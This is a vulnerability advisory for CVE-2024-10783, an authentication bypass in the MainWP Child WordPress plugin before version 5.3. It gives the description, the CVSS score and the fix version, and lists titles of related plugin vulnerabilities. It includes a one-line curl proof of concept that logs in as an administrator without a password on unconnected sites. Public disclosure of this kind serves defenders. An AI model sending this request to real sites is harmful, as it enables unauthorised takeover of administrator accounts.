MainWP Child < 5.3 – Authentication Bypass | CVE 2024-10783

Description

The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default).

Proof of Concept

curl -v -XPOST -d 'function=register&pubkey=&user={{username}}' 'https://example.com'

Affects Plugins

mainwp-child

Fixed in 5.3

References

CVE

CVE-2024-10783

URL

https://www.kernelmode.blog/mainwp-refuses-to-patch-critical-flaw-leaving-sites-vulnerable-to-takeover/

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-287

CVSS

8.1 (high)

Miscellaneous

Original Researcher

Sean Murphy

Submitter

Sean Murphy

Submitter website

https://www.kernelmode.blog/

Verified

Yes

WPVDB ID

1898d4f4-1874-4d00-8930-15774d57c9ed

Timeline

Publicly Published

2024-11-12 (about 1 year ago)

Added

2024-11-19 (about 1 year ago)

Last Updated

2024-12-05 (about 1 year ago)

Other

Published

Title

Published

2025-12-04

Title

Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login – User Verification < 2.0.45 - Authentication Bypass to Account Takeover

Published

2025-11-21

Title

Construction Light < 1.6.8 - Subscriber+ Arbitrary Plugin Activation

Published

2014-08-01

Title

Spam Free Plugin 1.9.2 - IP Blocklist Restriction Bypass

Published

2018-09-10

Title

UserPro <= 4.9.27 - User Registration With Administrator Role

Published

2025-07-11

Title

Simple Link Directory < 14.8.1 - Authentication Bypass